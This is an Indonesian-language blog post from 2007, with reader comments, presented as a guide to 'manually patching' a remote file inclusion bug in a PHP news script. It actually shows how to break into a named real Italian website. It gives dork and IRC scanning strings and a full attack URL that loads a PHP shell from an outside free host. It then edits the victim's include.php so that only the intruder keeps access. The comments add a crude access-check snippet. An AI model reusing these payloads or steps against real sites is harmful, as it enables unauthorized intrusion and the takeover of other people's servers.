By Cyberlog
Published: October 7, 2007
Print
Email
Ga seru kalo kita hanya bisa melakukan
deface web target tanpa pernah mau tahu untuk menutup bug tersebut [
admin security yang baik harus berpikiran secara positif ], padahal
untuk menutup bug pada web target bisa dilakukan dengan banyak cara dan
kita bisa melakukannya secara manual, penulis akan mencoba memberikan
step by step langkah melakukan patching manual secara sederhana tidak
perlu berpikiran terlalu jauh karena dengan tehnik ini akan dapat
menipu sang penyerang untuk bisa masuk ke dalam target, ok’s penulis
coba ambil situs luar [ just for test admin ], kenapa penulis tidak
mengambil contoh web target lokal ? jawabannya simpel dan sederhana ada
dibenak anda , langsung aja jalankan paman google masukan string bug
untuk : newspublish/, atau bila ga mau pusing masuk ke Server IRC cari
chanel Underground Indonesia dan lakukan scanning terhadap target
dengan string = !scan newspublish/include.php?path[docroot]=, penulis
ambil contoh target :
http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]= kemudian
seperti biasa lakukan penetrasi dengan phpshell yang kita tanam di
situs gratisan, seperti dibawah ini,
http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]=
http://ernigalak.t35.com/mama.txt? Maka akan nampak seperti dibawah ini hasilnya :
 perhatikan
letak file yang bermasalah terdapat di file include.php, perhatikan di
dalam phpshell 99 bahwa file yang bermasalah pasti akan berbeda dengan
file lainnya , yaitu dari warnanya yang kuning , disini penulis
tidak akan membahas kenapa file yang bermasalah itu dapat di injeksi
oleh phpshell, next time penulis akan buat artikelnya, so kembali ke
awal, kemudian change mode file tersebut dengan permit 0777 istilah
kerennya mah bisa dibaca,diliat, ditulis, dimodifikasi, xixixxix
bingung ? ya pegangan tembok mas/mbak, just kidding , coba longok basis
linux commands, liat di bawah ini :

Lakukan save, kemudian kembali ke halaman http://www.popolariudeur.pv.it/public/amministrazione/newspublish
, setelah kita buat permit 0777, langkah berikutnya adalah melihat file
include.php, klik file include.php perhatikan script yang bermasalah
yaitu ada pada” include{$path[“docroot”].”newpublish/class.news.php”};

coba
kita akan ambil logika dari halaman ini, perhatikan sekali lagi tulisan
“docroot”, apakah bila kita rubah tulisan ini akan dapat mengecoh sang
penyerang ? pertanyaan yang bagus, kita dapat asumsikan dengan sesorang
yang mengetahui kunci rumah kita dan sewaktu-waktu dapat masuk kapan
saja, tetapi bila kita rubah kunci tersebut dengan kunci lain, apakah
seseorang dapat masuk juga ? penulis ga mau jawab pertanyaannya, anda
yang tahu jawabannya, xixixix, btw balik lagi ke awal sekarang kita
akan coba merubah tulisan ini dengan tulisan lain , penulis ambil
contoh melakukan perubahan tulisan docroot menjadi tulisan cyberlog [
docroot rename cyberlog ], kita akan membuktikan apakah dengan merubah
tulisan tersebut dapat mengecoh sang penyerang ?. sebelum melakukan
perubahan pastikan file include.php dalam permitt 0777 [ all modication
], ok saatnya klik di sebelah kanan phpshell 99 file include.php , edit
file include seperti dibawah ini :

penulis
lakukan perubahan tulisan “docroot” menjadi tulisan “cyberlog”,
kemudian save perubahan tersebut, bila memang permitt 0777 file akan
dapat tersimpan seperti dibawah ini

Kemudian
coba kita lakukan penetrasi seperti awal tadi, perhatikan maka halaman
akan error, coz secara logika penyerang akan kesulitan untuk masuk ke
dalam web target lewat bug tersebut karena kita sudah lakukan perubahan
terhadap tulisan “docroot”
 Sekarang kita coba lakukan penetrasi dengan perubahan yang tadi kita buat maka akan nampak hasil seperti dibawah ini :

Liat kita dapat masuk kedalam target ,
dengan hanya bermodalkan sedikit alur logika kita, kita dapat lakukan
pacthing secara sederhana tanpa perlu susah payah melakukan update
secara otomatis serta dapat menguasai web target sendirian tanpa orang
lain bisa masuk Note : don’t Change My article  Curhat
dikit : penulis bukan hacker loh mas/mbak, hanya pencinta Homo eeh
salah pencinta dunia underground cause senang aja di ajak curhat
apalagi sama anak-anak SO te@m di chanel : #sekuritionline, #mimid,
#Semprol, #bajingan, pernah ditanya orang : mas chanel sekuritionline
tuh chanel satpam ya mas kok klo pagi sepi mas ? ada juga yang nanya
kok channel ga ada penghuninya Cuma boot aja ? ada juga yang nanya
chanel hacker kok ga ada yang bahas hacking malah pada curhat sama
lawak semua ? xiixxi lucu juga dengernya , jawabannya sederhana, kita
tetap eksis di channel, Cuma memang uda males bahas hacking mending
ngelawak aja, rencana buat buku tentang hacking yang diwakilin om
letjen, seminar lom sempet jalan masih tahap schedule, web development
uda jalan Cuma clietnya lom ada [ sekalinya ada mintanya macem2, but
harganya kaki 5 ] , coz paling laku dijual adalah &*^&* [ secret dikit ] uda aah mo bobok sama bini, xixixixxiixx Kamis, 10-04-07, Night, mertua Home, time : 23.30
View Comments (4)
|
mmm... masukan sedikit mas cyberlog,
Merubah Variable pada sebuah file saya pikir sangat tidak dianjurkan karena akan membuat error pada aplikasi web tersebut, terjadinya error dikarena beberapa file memanggil file tersebut namun variablenya tidak ada dalam file2 pendukung lainnya, Solusinya mungkin dengan cara menggunakan script ;
----LINE-0----
if (ereg("NAMAFILE.php",$PHP_SELF))
{
header("location:index.php"
die;
}
---LINE-Berikutnya---
dengan begini setiap user atau attacker yang mencoba langsung mengakses file tersebut akan di Deny/Die
CMIIW
seps, kitkat yups anda benar, memang klo kita paksa menutup pacth dengan cara itu maka akan mengakibatkan beberapa file tidak terkoneksi karena ada perubahan file, cuma memang aku membreitahu yang simpel-simpel aja, dengan begitu orang yang beljar hacking akan begitu semangat !! thank's bro akan masukannya, share trus :
yap yang diubah itu jangan variable tapi tambahkan seperti line diatas , dan pastikan PHP.INI nya bener2x di liat ..
man pls can you give the comersus text code